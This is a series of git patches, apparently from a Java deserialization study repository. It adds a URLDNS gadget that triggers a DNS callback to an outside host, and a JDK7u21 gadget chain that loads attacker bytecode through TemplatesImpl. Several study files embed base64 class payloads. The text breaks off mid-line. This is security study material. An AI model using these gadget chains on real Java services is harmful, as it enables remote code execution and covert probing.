From a506fe4c443fb76451ecd03fc403126ac06b1259 Mon Sep 17 00:00:00 2001 From: phith0n Date: Thu, 3 Jun 2021 21:34:14 +0800 Subject: [PATCH 01/10] URLDNS --- .../com/govuln/deserialization/URLDNS.java | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 general/src/main/java/com/govuln/deserialization/URLDNS.java diff --git a/general/src/main/java/com/govuln/deserialization/URLDNS.java b/general/src/main/java/com/govuln/deserialization/URLDNS.java new file mode 100644 index 0000000..296614c --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/URLDNS.java @@ -0,0 +1,52 @@ +package com.govuln.deserialization; + +import java.io.*; +import java.lang.reflect.Field; +import java.net.InetAddress; +import java.net.URL; +import java.net.URLConnection; +import java.net.URLStreamHandler; +import java.util.HashMap; + +public class URLDNS { + + static class SilentURLStreamHandler extends URLStreamHandler { + + protected URLConnection openConnection(URL u) throws IOException { + return null; + } + + protected synchronized InetAddress getHostAddress(URL u) { + return null; + } + } + + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } + + public static void main(String []args) throws Exception { + String url = "http://dns.675ba661.y7z.xyz"; + + //Avoid DNS resolution during payload creation + //Since the field java.net.URL.handler is transient, it will not be part of the serialized payload. + URLStreamHandler handler = new SilentURLStreamHandler(); + + HashMap ht = new HashMap(); // HashMap that will contain the URL + URL u = new URL(null, url, handler); // URL to use as the Key + ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup. + + setFieldValue(u, "hashCode", -1); + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(ht); + oos.close(); + + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } +} From 12d64473659597c5d5b75b290faebec2e8a87661 Mon Sep 17 00:00:00 2001 From: phith0n Date: 2021年6月23日 12:03:30 +0800 Subject: [PATCH 02/10] add JDK7u21 --- general/general.iml | 19 ++++++ general/pom.xml | 15 +++-- .../com/govuln/bytes/HelloDefineClass.java | 5 +- .../com/govuln/bytes/HelloTemplatesImpl.java | 4 +- .../deserialization/CommonsCollections3.java | 1 - .../CommonsCollectionsIntro2.java | 4 +- .../CommonsCollectionsIntro3.java | 4 +- .../com/govuln/deserialization/JDK7u21.java | 66 +++++++++++++++++++ .../TemplatesImplDeserialization.java | 4 +- 9 files changed, 107 insertions(+), 15 deletions(-) create mode 100644 general/general.iml create mode 100644 general/src/main/java/com/govuln/deserialization/JDK7u21.java diff --git a/general/general.iml b/general/general.iml new file mode 100644 index 0000000..7ee5fc5 --- /dev/null +++ b/general/general.iml @@ -0,0 +1,19 @@ + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/general/pom.xml b/general/pom.xml index 8ad9f54..9153046 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -14,8 +14,8 @@ UTF-8 - 1.8 - 1.8 + 1.7 + 1.7 @@ -42,6 +42,13 @@ javassist 3.12.1.GA + + + commons-codec + commons-codec + 1.15 + + @@ -94,8 +101,8 @@ org.apache.maven.plugins maven-compiler-plugin - 8 - 8 + 7 + 7 diff --git a/general/src/main/java/com/govuln/bytes/HelloDefineClass.java b/general/src/main/java/com/govuln/bytes/HelloDefineClass.java index 9ae4bb9..93c46ac 100644 --- a/general/src/main/java/com/govuln/bytes/HelloDefineClass.java +++ b/general/src/main/java/com/govuln/bytes/HelloDefineClass.java @@ -1,7 +1,8 @@ package com.govuln.bytes; +import org.apache.commons.codec.binary.Base64; + import java.lang.reflect.Method; -import java.util.Base64; public class HelloDefineClass { public static void main(String[] args) throws Exception { @@ -9,7 +10,7 @@ public static void main(String[] args) throws Exception { defineClass.setAccessible(true); // source: bytecodes/Hello.java - byte[] code = Base64.getDecoder().decode("yv66vgAAADQAHAoABgAOCQAPABAIABEKABIAEwcAFAcAFQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAAg8Y2xpbml0PgEAClNvdXJjZUZpbGUBAApIZWxsby5qYXZhDAAHAAgHABYMABcAGAEAC0hlbGxvIFdvcmxkBwAZDAAaABsBAAVIZWxsbwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3lzdGVtAQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYAIQAFAAYAAAAAAAIAAQAHAAgAAQAJAAAAHQABAAEAAAAFKrcAAbEAAAABAAoAAAAGAAEAAAACAAgACwAIAAEACQAAACUAAgAAAAAACbIAAhIDtgAEsQAAAAEACgAAAAoAAgAAAAQACAAFAAEADAAAAAIADQ=="); + byte[] code = Base64.decodeBase64("yv66vgAAADQAHAoABgAOCQAPABAIABEKABIAEwcAFAcAFQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAAg8Y2xpbml0PgEAClNvdXJjZUZpbGUBAApIZWxsby5qYXZhDAAHAAgHABYMABcAGAEAC0hlbGxvIFdvcmxkBwAZDAAaABsBAAVIZWxsbwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3lzdGVtAQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYAIQAFAAYAAAAAAAIAAQAHAAgAAQAJAAAAHQABAAEAAAAFKrcAAbEAAAABAAoAAAAGAAEAAAACAAgACwAIAAEACQAAACUAAgAAAAAACbIAAhIDtgAEsQAAAAEACgAAAAoAAgAAAAQACAAFAAEADAAAAAIADQ=="); Class hello = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(), "Hello", code, 0, code.length); hello.newInstance(); } diff --git a/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java b/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java index 598788e..c8fae6f 100644 --- a/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java +++ b/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java @@ -2,9 +2,9 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import java.lang.reflect.Field; -import java.util.Base64; public class HelloTemplatesImpl { public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { @@ -15,7 +15,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java index 521ce73..d8cce44 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java @@ -20,7 +20,6 @@ import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; -import java.util.Base64; import java.util.HashMap; import java.util.Map; diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java index d50a6ed..1ed70dd 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java @@ -2,6 +2,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; @@ -9,7 +10,6 @@ import org.apache.commons.collections.Transformer; import java.lang.reflect.Field; -import java.util.Base64; import java.util.HashMap; import java.util.Map; @@ -22,7 +22,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java index 0694a86..c7b8427 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java @@ -3,6 +3,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InstantiateTransformer; @@ -11,7 +12,6 @@ import javax.xml.transform.Templates; import java.lang.reflect.Field; -import java.util.Base64; import java.util.HashMap; import java.util.Map; @@ -24,7 +24,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/general/src/main/java/com/govuln/deserialization/JDK7u21.java b/general/src/main/java/com/govuln/deserialization/JDK7u21.java new file mode 100644 index 0000000..e3fb4d0 --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/JDK7u21.java @@ -0,0 +1,66 @@ +package com.govuln.deserialization; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import org.apache.commons.codec.binary.Base64; + +import javax.xml.transform.Templates; +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Proxy; +import java.util.HashMap; +import java.util.LinkedHashSet; +import java.util.Map; + +public class JDK7u21 { + public static void main(String[] args) throws Exception { + TemplatesImpl templates = new TemplatesImpl(); + setFieldValue(templates, "_bytecodes", new byte[][]{ + ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode() + }); + setFieldValue(templates, "_name", "HelloTemplatesImpl"); + setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); + + String zeroHashCodeStr = "f5a5a608"; + + HashMap map = new HashMap(); + map.put(zeroHashCodeStr, "foo"); + + Constructor handlerConstructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class); + handlerConstructor.setAccessible(true); + InvocationHandler tempHandler = (InvocationHandler) handlerConstructor.newInstance(Override.class, map); + + setFieldValue(tempHandler, "type", Templates.class); + Templates proxy = (Templates) Proxy.newProxyInstance(JDK7u21.class.getClassLoader(), new Class[]{Templates.class}, tempHandler); + + LinkedHashSet set = new LinkedHashSet(); // maintain order + set.add(templates); + set.add(proxy); + + setFieldValue(templates, "_auxClasses", null); + setFieldValue(templates, "_class", null); + + map.put(zeroHashCodeStr, templates); // swap in real object + + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(set); + oos.close(); + + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } + + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java b/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java index ec9aa5e..c2ff080 100644 --- a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java +++ b/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java @@ -2,6 +2,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; @@ -20,7 +21,6 @@ import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; -import java.util.Base64; import java.util.HashMap; import java.util.Map; @@ -33,7 +33,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); + byte[] code = 